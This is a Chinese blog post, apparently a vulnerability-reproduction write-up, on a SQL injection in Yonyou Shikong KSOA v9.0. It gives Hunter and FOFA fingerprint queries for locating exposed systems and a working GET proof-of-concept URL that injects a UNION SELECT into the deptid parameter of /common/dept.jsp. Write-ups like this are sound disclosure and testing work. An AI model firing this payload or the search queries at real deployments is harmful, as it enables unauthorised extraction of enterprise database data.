注入之漏洞

已于 2023-10-19 14:37:10 修改
阅读量144 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2023-10-16 21:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zkaqlaoniao/article/details/133859702
版权

目录

0x01 漏洞介绍

0x02 影响版本

0x03 语法特征

0x04 漏洞复现

如果文章对你有帮助,欢迎关注、点赞、收藏一键三连支持以下哦!
想要一起交流学习的小伙伴可以加zkaq222(备注CSDN,不备注通不过哦)进入学习,共同学习进步

0x01 漏洞介绍


KSOA可以通过不同产品的组合,帮助流通领域企业实现“交易自动化、管理信息化、决策智能化、商务电子化”的目标,满足企业决策层、管理层、操作层不用应用者的需求。用友时空 KSOA 软件存在存在sql注入漏洞,可利用该漏洞获取系统敏感信息


0x02 影响版本


用友时空KSOA v9.0


0x03 语法特征

 

  1. hunter: app.name="用友时空 KSOA"
  2. FOFA: title="企业信息系统门户"
 

0x04 漏洞复现
 


 打开页面
  
 

 


 POC(GET)
 

 
 
url+/common/dept.jsp?deptid=1' UNION ALL SELECT 60%2Csys.fn_sqlvarbasetostr(HASHBYTES('MD5'%2C'1234'))--
 

 

POC内的1234可自定义内容
 直接访问可得
  
 

 


 解密81dc9bdb52d04dc20036dbd8313ed055(MD5值)
 

 

还没看够?可以扫码关注呦
 

 

 
 
 
  
渗透工具
 
 
 

 

 
 

 

 
 
 
  
视频
 
  
基础到进阶
 
  
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 
 
 

 

 
 

 

                

        

        

    




    

      

        

            

              
                
                  渗透测试老鸟-九青
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
用友时空KSOA存在sql注入漏洞 附POC

				
			

			

				

					nnn2188185的博客
				

				

					09-24
					
					369
					
				

			

		

		

			
				
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,该产品common/dept.jsp接口存在SQL注入漏洞

			
		

	



                

              
                



	

		

			

				
					
用友时空KSOA SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					08-13
					
					2413
					
				

			

		

		

			
				
用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

			
		

	



                


  
              

                


	

		

			

				
					
用友-时空KSOA QueryService sql注入漏洞复现_笔记

					
最新发布

				
			

			

				

					m0_50488257的博客
				

				

					04-26
					
					211
					
				

			

		

		

			
				
用友-时空KSOA;SQL SERVER ;sql 注入漏洞复现;

			
		

	





	

		

			

				
					
时空智友企业信息管理系统 SQL注入漏洞复现

				
			

			

				

					
				

				

					09-19
					
					889
					
				

			

		

		

			
				
时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。

			
		

	



		

			
		



	

		

			

				
					
漏洞复现】用友时空KSOA sKeyvalue参数存在SQL注入漏洞

				
			

			

				

					qq_34780861的博客
				

				

					04-01
					
					244
					
				

			

		

		

			
				
用友时空KSOA平台sKeyvalue参数存在SQL注入漏洞

			
		

	





	

		

			

				
					
用友时空 KSOA 多处SQL注入漏洞复现

				
			

			

				

					0xSec
				

				

					12-13
					
					1174
					
				

			

		

		

			
				
用友时空 KSOA 系统 PayBill、QueryService、linkadd.jsp等接口处存在 sql 注入漏洞,攻击者可通过这些漏洞获取数据库权限,启用xp_cmdshell 可执行任意命令获取服务器权限。

			
		

	





	

		

			

				
					
SQL注入漏洞全接触.ppt

				
			

			

				

					11-15
				

			

		

		

			
				
"SQL注入漏洞全接触"知识点总结  一、 SQL注入漏洞的定义和原理  * SQL注入漏洞是指攻击者通过构造特殊的输入,来获取或修改服务器上的敏感数据。 * SQL注入漏洞的原理是从客户端提交特殊的代码,从而收集程序及...

			
		

	





	

		

			

				
					
sqlmap注入漏洞测试

				
			

			

				

					02-22
				

			

		

		

			
				
资源内容:sqlmap注入漏洞测试

			
		

	





	

		

			

				
					
mysql5 注入漏洞

				
			

			

				

					10-30
				

			

		

		

			
				
mysql5注入漏洞代码

			
		

	





	

		

			

				
					
SQL注入漏洞全接触

				
			

			

				

					03-03
				

			

		

		

			
				
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面...

			
		

	





	

		

			

				
					
漏洞复现】用友时空-KSOA-ImageUpload-文件上传

				
			

			

				

					知黑而守白
				

				

					03-26
					
					88
					
				

			

		

		

			
				
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业前沿的IT需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA ImageUpload 接口存在一个任意文件上传漏洞,该漏洞使得攻击者可以在受影响的系统上上传恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。攻击者可以通过上传恶意文件来滥用系统,可能导致灾难性后果。

			
		

	





	

		

			

				
					
用友时空KSOA软件前台文件上传漏洞

				
			

			

				

					holyxp的博客
				

				

					08-01
					
					602
					
				

			

		

		

			
				
用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。

			
		

	





	

		

			

				
					
用友时空KSOA UploadImage任意文件上传漏洞

				
			

			

				

					Keepb1ue的博客
				

				

					12-24
					
					1902
					
				

			

		

		

			
				
用友时空 KSOA 是根据流通企业前沿的IT需求推出的统的IT基础架构,它可以让流通企业各个时期建立的 IT 系统之间彼此轻松对话。由于用友时空设备开放了文件上传功能,但未鉴权且上传的文件类型、大小、格式、路径等方面进行严格的限制和过滤,导致攻击者可以通过构造恶意文件并上传到服务器,再利用该漏洞获取权限并执行任意命令。2.设置内容检测机制和白名单上传机制。1.通过防火墙等安全设备限制访问策略。3.如非必要,禁止公网访问该系统。app=“用友-时空KSOA

			
		

	





	

		

			

				
					
用友时空KSOA sKeyvalue SQL注入漏洞复现

				
			

			

				

					Keepb1ue的博客
				

				

					12-29
					
					584
					
				

			

		

		

			
				
用友KSOA用友集团推出的一款基于SOA架构的企业级应用平台,旨在为企业提供全面的信息化解决方案。它包括了多个模块,如财务管理、人力资源管理、供应链管理等,可以帮助企业实现数字化转型。它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。

			
		

	





	

		

			

				
					
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用

				
			

			

				

					0xSec
				

				

					04-04
					
					2139
					
				

			

		

		

			
				
用友时空KSOA平台ImageUpload处存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。

			
		

	





	

		

			

				
					
用友NC 漏洞汇总(转载)

				
			

			

				

					xiaobai_20190815的博客
				

				

					11-21
					
					8854
					
				

			

		

		

			
				
用友NC 漏洞汇总

			
		

	





	

		

			

				
					
用友时空KSOAV9.0文件上传漏洞复现

				
			

			

				

					weixin_53884648的博客
				

				

					05-22
					
					1168
					
				

			

		

		

			
				
用友时空文件上传漏洞复现

			
		

	





	

		

			

				
					
无胁科技-TVD每日漏洞情报-2022-7-30

				
			

			

				

					wuthreat无胁科技的博客
				

				

					07-30
					
					878
					
				

			

		

		

			
				
参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?参考链接https//tvd.wuthreat.com/#/listDetail?漏洞编号CNVD-2022-14717。相关涉及用友时空KSOA软件。...

			
		

	





	

		

			

				
					
sqlmap之注入漏洞

				
			

			

				

					07-28
				

			

		

		

			
				
对于SQL注入漏洞,SQLMap是一个常用的自动化工具,用于检测和利用这类漏洞。它可以通过发送特制的SQL语句来判断目标应用程序是否存在注入漏洞,并且可以进一步利用这些漏洞执行各种攻击。  SQLMap可以通过以下几种...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值